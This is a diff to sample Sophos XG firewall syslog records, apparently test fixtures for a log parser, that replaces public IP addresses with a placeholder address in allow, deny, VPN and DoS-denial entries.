oldversion=9.17.09 newversion=9.17.10 message="IPS definitions upgraded from 9.17.09 to 9.17.10." <30>device="SFW" date=2020-05-18 time=14:39:10 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=063311617923 log_type="Event" log_component="Appliance" log_subtype="System" priority=Information backup_mode='appliance' message="Scheduled backup to appliance is successful." 
<30>device="SFW" date=2020-05-18 time=14:39:20 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=062910617703 log_type="Event" log_component="Firewall Authentication" log_subtype="Authentication" status="Successful" priority=Information user_name="elastic.user@elastic.test.com" usergroupname="VPN.SSL.Users.elastic" auth_client="IPSec" auth_mechanism="N/A" reason="" src_ip=10.84.234.38 src_mac="" start_time=1591086575 sent_bytes=0 recv_bytes=0 message="User elastic.user@elastic.test.com was logged out of firewall" name="elastic.user@elastic.test.com" timestamp=1591086576 
@@ -49,29 +49,29 @@ <30>device="SFW" date=2017-03-16 time=12:53:27 timezone="IST" device_name="XG125w" device_id=S1601E1F9FCB7EE log_id=066811618015 log_type="Event" log_component="RED" log_subtype="System" priority=Information red_id=A350196C47072B0 status="Disconnected" eventtime="2017-03-16 12:53:27 IST" duration=0 branch_name=Gaurav Patel recv_bytes=31488 sent_bytes=22368 message="A350196C47072B0/Gaurav Patel is now disconnected" <30>device="SFW" date=2017-03-16 time=12:46:26 timezone="IST" device_name="XG125w" device_id=S1601E1F9FCB7EE log_id=066811618016 log_type="Event" log_component="RED" log_subtype="System" priority=Information red_id=A350196C47072B0 status="Interim" eventtime="2017-03-16 12:46:26 IST" duration=0 branch_name=NY recv_bytes=0 sent_bytes=0 message="A350196C47072B0/NY transfered bytes TX: 0 RX: 0" <30>device="SFW" date=2018-06-06 time=11:12:10 timezone="IST" device_name="SG430" device_id=S4000806149EE49 log_id=063711517815 log_type="Event" log_component="DDNS" log_subtype="System" status="Success" priority=Notice host=test1.customtest.dyndns.org updatedip=10.198.232.86 reason="" message="DDNS update for host test1.customtest.dyndns.org was Successful. Updated with IP 10.198.232.86." 
-<30>device="SFW" date=2020-05-18 time=14:38:37 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=11 fw_rule_id=21 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="HTTP" application_risk=1 application_technology="Browser Based" application_category="General Internet" in_interface="Port1" out_interface="Port2" src_mac=00:00:00:00:00:00 src_ip=172.17.34.15 src_country_code=R1 dst_ip=91.228.167.86 dst_country_code=SVK protocol="TCP" src_port=62841 dst_port=80 sent_pkts=6 recv_pkts=5 sent_bytes=459 recv_bytes=606 tran_src_ip=213.167.51.66 tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="LAN" srczone="LAN" dstzonetype="WAN" dstzone="WAN" dir_disp="" connevent="Stop" connid="1617925280" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-05-18 time=14:38:38 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=0 fw_rule_id=67 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=15 appfilter_policy_id=0 application="DNS" application_risk=1 application_technology="Network Protocol" application_category="Infrastructure" in_interface="Port3.400" out_interface="Port2" src_mac=00:00:00:00:00:00 src_ip=172.16.66.155 src_country_code=R1 dst_ip=91.228.165.117 dst_country_code=SVK protocol="UDP" src_port=49144 dst_port=53 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=185.8.209.194 tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="DMZ" srczone="DMZ" dstzonetype="WAN" dstzone="WAN" dir_disp="" connevent="Start" connid="3360392048" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" 
date=2020-05-18 time=14:38:39 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010102600002 log_type="Firewall" log_component="Firewall Rule" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name="" user_gp="" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="Port2" src_mac=24:01:c7:07:2b:a2 src_ip=172.17.35.113 src_country_code="" dst_ip=172.20.4.52 dst_country_code="" protocol="TCP" src_port=53287 dst_port=4980 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-05-18 time=14:38:37 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=11 fw_rule_id=21 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="HTTP" application_risk=1 application_technology="Browser Based" application_category="General Internet" in_interface="Port1" out_interface="Port2" src_mac=00:00:00:00:00:00 src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=SVK protocol="TCP" src_port=62841 dst_port=80 sent_pkts=6 recv_pkts=5 sent_bytes=459 recv_bytes=606 tran_src_ip=175.16.199.1 tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="LAN" srczone="LAN" dstzonetype="WAN" dstzone="WAN" dir_disp="" connevent="Stop" connid="1617925280" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-05-18 time=14:38:38 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010101600001 
log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=0 fw_rule_id=67 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=15 appfilter_policy_id=0 application="DNS" application_risk=1 application_technology="Network Protocol" application_category="Infrastructure" in_interface="Port3.400" out_interface="Port2" src_mac=00:00:00:00:00:00 src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=SVK protocol="UDP" src_port=49144 dst_port=53 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=175.16.199.1 tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="DMZ" srczone="DMZ" dstzonetype="WAN" dstzone="WAN" dir_disp="" connevent="Start" connid="3360392048" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-05-18 time=14:38:39 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010102600002 log_type="Firewall" log_component="Firewall Rule" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name="" user_gp="" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="Port2" src_mac=24:01:c7:07:2b:a2 src_ip=175.16.199.1 src_country_code="" dst_ip=175.16.199.1 dst_country_code="" protocol="TCP" src_port=53287 dst_port=4980 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 <30>device="SFW" date=2020-05-18 time=14:38:40 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010102600002 log_type="Firewall" log_component="Firewall Rule" log_subtype="Denied" status="Deny" priority=Information duration=0 
fw_rule_id=29 policy_type=1 user_name="elastic@user.local" user_gp="elastic.group.local" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="tun0" out_interface="Port1" src_mac="" src_ip=10.82.234.6 src_country_code="" dst_ip=192.168.0.1 dst_country_code="" protocol="TCP" src_port=60102 dst_port=53 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-05-18 time=14:38:41 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010302602002 log_type="Firewall" log_component="Appliance Access" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port2" out_interface="" src_mac=c4:f7:d5:b5:47:f4 src_ip=51.77.56.9 src_country_code="" dst_ip=185.7.209.207 dst_country_code="" protocol="TCP" src_port=55039 dst_port=18 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-05-18 time=14:38:42 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010102600002 log_type="Firewall" log_component="Firewall Rule" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name="elastic@user.local" user_gp="elastic.group.local" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" 
application_category="" in_interface="Port1" out_interface="Port2" src_mac=24:01:c7:07:2b:a2 src_ip=172.17.35.101 src_country_code="" dst_ip=192.168.5.11 dst_country_code="" protocol="TCP" src_port=51826 dst_port=1109 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-05-18 time=14:38:43 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010402403001 log_type="Firewall" log_component="DoS Attack" log_subtype="Denied" status="Deny" priority=Warning duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="" src_mac=34:db:fd:83:d8:09 src_ip=172.16.36.105 src_country_code="" dst_ip=10.84.234.14 dst_country_code="" protocol="UDP" src_port=3389 dst_port=64465 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-05-18 time=14:38:41 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010302602002 log_type="Firewall" log_component="Appliance Access" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port2" out_interface="" src_mac=c4:f7:d5:b5:47:f4 src_ip=175.16.199.1 src_country_code="" dst_ip=175.16.199.1 dst_country_code="" protocol="TCP" src_port=55039 dst_port=18 
sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-05-18 time=14:38:42 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010102600002 log_type="Firewall" log_component="Firewall Rule" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name="elastic@user.local" user_gp="elastic.group.local" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="Port2" src_mac=24:01:c7:07:2b:a2 src_ip=175.16.199.1 src_country_code="" dst_ip=192.168.5.11 dst_country_code="" protocol="TCP" src_port=51826 dst_port=1109 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-05-18 time=14:38:43 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010402403001 log_type="Firewall" log_component="DoS Attack" log_subtype="Denied" status="Deny" priority=Warning duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="" src_mac=34:db:fd:83:d8:09 src_ip=175.16.199.1 src_country_code="" dst_ip=10.84.234.14 dst_country_code="" protocol="UDP" src_port=3389 dst_port=64465 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" 
vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 <30>device="SFW" date=2020-05-18 time=14:38:44 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=012802605201 log_type="Firewall" log_component="SSL VPN" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="tun0" out_interface="" src_mac="" src_ip=10.82.234.9 src_country_code="" dst_ip=10.82.234.11 dst_country_code="" protocol="TCP" src_port=58331 dst_port=56267 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-05-18 time=14:38:45 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=0 fw_rule_id=61 policy_type=2 user_name="elastic@user.local" user_gp="elastic.group.local" iap=0 ips_policy_id=11 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="ipsec0" out_interface="Port2" src_mac=00:00:00:00:00:00 src_ip=10.84.234.7 src_country_code=R1 dst_ip=172.16.34.50 dst_country_code=R1 protocol="TCP" src_port=58543 dst_port=443 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="VPN" srczone="VPN" dstzonetype="VPN" dstzone="VPN" dir_disp="" connevent="Start" connid="1615935064" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-05-18 time=14:38:45 timezone="CEST" 
device_name="XG230" device_id=1234567890123457 log_id=018201500005 log_type="Firewall" log_component="ICMP ERROR MESSAGE" log_subtype="Allowed" status="Allow" priority=Notice duration=0 fw_rule_id=60 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=17 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="" src_mac=34:db:fd:83:d8:09 src_ip=192.168.1.254 src_country_code="" dst_ip=172.17.32.19 dst_country_code="" protocol="ICMP" icmp_type=3 icmp_code=1 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connevent="Interim" connid="2685668438" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2020-06-05 time=12:38:53 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=10 fw_rule_id=60 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=17 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="ipsec0" out_interface="Port1" src_mac=00:00:00:00:00:00 src_ip=172.17.35.119 src_country_code=R1 dst_ip=172.16.34.10 dst_country_code=R1 protocol="TCP" src_port=61925 dst_port=88 sent_pkts=6 recv_pkts=6 sent_bytes=1802 recv_bytes=1732 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0srczonetype="VPN" srczone="VPN" dstzonetype="LAN" dstzone="LAN" dir_disp="" connevent="Stop" connid="1617126256" vconnid="" hb_health="NoHeartbeat" message="" appresolvedby="Signature" app_is_cloud=0" -<30>device="SFW" date=2018-05-30 time=13:26:37 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010202601001 log_type="Firewall" log_component="Invalid Traffic" log_subtype="Denied" 
status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=10.198.32.19 src_country_code= dst_ip=8.8.8.8 dst_country_code= protocol="UDP" src_port=1353 dst_port=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="Invalid UDP destination." appresolvedby=" Signature" +<30>device="SFW" date=2020-05-18 time=14:38:45 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=0 fw_rule_id=61 policy_type=2 user_name="elastic@user.local" user_gp="elastic.group.local" iap=0 ips_policy_id=11 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="ipsec0" out_interface="Port2" src_mac=00:00:00:00:00:00 src_ip=10.84.234.7 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=R1 protocol="TCP" src_port=58543 dst_port=443 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="VPN" srczone="VPN" dstzonetype="VPN" dstzone="VPN" dir_disp="" connevent="Start" connid="1615935064" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-05-18 time=14:38:45 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=018201500005 log_type="Firewall" log_component="ICMP ERROR MESSAGE" log_subtype="Allowed" status="Allow" priority=Notice duration=0 fw_rule_id=60 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=17 appfilter_policy_id=0 application="" 
application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="" src_mac=34:db:fd:83:d8:09 src_ip=192.168.1.254 src_country_code="" dst_ip=175.16.199.1 dst_country_code="" protocol="ICMP" icmp_type=3 icmp_code=1 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip="" tran_src_port=0 tran_dst_ip="" tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connevent="Interim" connid="2685668438" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" app_is_cloud=0 +<30>device="SFW" date=2020-06-05 time=12:38:53 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=010101600001 log_type="Firewall" log_component="Firewall Rule" log_subtype="Allowed" status="Allow" priority=Information duration=10 fw_rule_id=60 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=17 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="ipsec0" out_interface="Port1" src_mac=00:00:00:00:00:00 src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=R1 protocol="TCP" src_port=61925 dst_port=88 sent_pkts=6 recv_pkts=6 sent_bytes=1802 recv_bytes=1732 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0srczonetype="VPN" srczone="VPN" dstzonetype="LAN" dstzone="LAN" dir_disp="" connevent="Stop" connid="1617126256" vconnid="" hb_health="NoHeartbeat" message="" appresolvedby="Signature" app_is_cloud=0" +<30>device="SFW" date=2018-05-30 time=13:26:37 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010202601001 log_type="Firewall" log_component="Invalid Traffic" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=10.198.32.19 
src_country_code= dst_ip=175.16.199.1 dst_country_code= protocol="UDP" src_port=1353 dst_port=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="Invalid UDP destination." appresolvedby=" Signature" <30>device="SFW" date=2018-06-04 time=17:20:24 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=011402601301 log_type="Firewall" log_component="Fragmented Traffic" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=0.0.0.0 src_country_code= dst_ip=0.0.0.0 dst_country_code= protocol="0" src_port=0 dst_port=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" <30>device="SFW" date=2018-05-30 time=14:01:32 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010302602002 log_type="Firewall" log_component="Appliance Access" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=2 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port2.611" out_interface="" src_mac=c8:5b:76:ab:72:d3 src_ip=10.198.38.184 src_country_code= dst_ip=10.198.39.255 dst_country_code= protocol="UDP" src_port=137 dst_port=137 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" 
vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" <30>device="SFW" date=2018-05-30 time=14:17:17 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010402403001 log_type="Firewall" log_component="DoS Attack" log_subtype="Denied" status="Deny" priority=Warning duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port1" out_interface="" src_mac=b8:97:5a:5b:0f:fd src_ip=10.198.32.19 src_country_code= dst_ip=10.198.32.48 dst_country_code= protocol="TCP" src_port=41960 dst_port=22 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby=" Signature" <30>device="SFW" date=2018-06-05 time=14:30:31 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010502604001 log_type="Firewall" log_component="ICMP Redirection" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=10.198.37.23 src_country_code= dst_ip=10.198.36.48 dst_country_code= protocol="ICMP" icmp_type=5 icmp_code=1 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby=" Signature" -<30>device="SFW" date=2018-05-31 time=17:05:14 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010602605001 log_type="Firewall" log_component="Source Routed" log_subtype="Denied" status="Deny" 
priority=Information duration=0 fw_rule_id=1 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=10.198.12.19 src_country_code= dst_ip=8.8.8.8 dst_country_code= protocol="TCP" src_port=1571 dst_port=80 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" +<30>device="SFW" date=2018-05-31 time=17:05:14 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=010602605001 log_type="Firewall" log_component="Source Routed" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=1 policy_type=1 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="" out_interface="" src_mac= src_ip=10.198.12.19 src_country_code= dst_ip=175.16.199.1 dst_country_code= protocol="TCP" src_port=1571 dst_port=80 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" <30>device="SFW" date=2018-05-30 time=15:09:51 timezone="IST" device_name="XG125w" device_id=SFDemo-763180a log_id=011702605051 log_type="Firewall" log_component="MAC Filter" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name="" user_gp="" iap=0 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port2.531" out_interface="" src_mac=1e:3a:5a:5b:23:ab src_ip=fe80::59f5:3ce8:c98e:5062 src_country_code= 
dst_ip=ff02::1:2 dst_country_code= protocol="UDP" src_port=546 dst_port=547 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="No Heartbeat" message="" appresolvedby="Signature" <30>device="SFW" date=2018-06-01 time=10:57:55 timezone="BST" device_name="XG310" device_id=SFDemo-9a04c43 log_id=016602600006 log_type="Firewall" log_component="Heartbeat" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=16 policy_type=1 user_name="" user_gp="" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port3.611" out_interface="" src_mac=08:00:27:4c:49:e3 src_ip=10.198.37.57 src_country_code= dst_ip=10.198.32.19 dst_country_code= protocol="ICMP" icmp_type=8 icmp_code=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" hb_health="Red" message="" appresolvedby="Signature" app_is_cloud=0 -<30>device="SFW" date=2018-06-01 time=10:55:41 timezone="BST" device_name="XG310" device_id=SFDemo-9a04c43 log_id=016602600003 log_type="Firewall" log_component="Heartbeat" log_subtype="Denied" status="Deny" priority=Information duration=0 fw_rule_id=16 policy_type=1 user_name="" user_gp="" iap=2 ips_policy_id=0 appfilter_policy_id=0 application="" application_risk=0 application_technology="" application_category="" in_interface="Port3.611" out_interface="" src_mac=08:00:27:4c:49:e3 src_ip=10.198.37.57 src_country_code= dst_ip=72.163.4.185 dst_country_code= protocol="ICMP" icmp_type=8 icmp_code=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype="" srczone="" dstzonetype="" dstzone="" dir_disp="" connid="" vconnid="" 
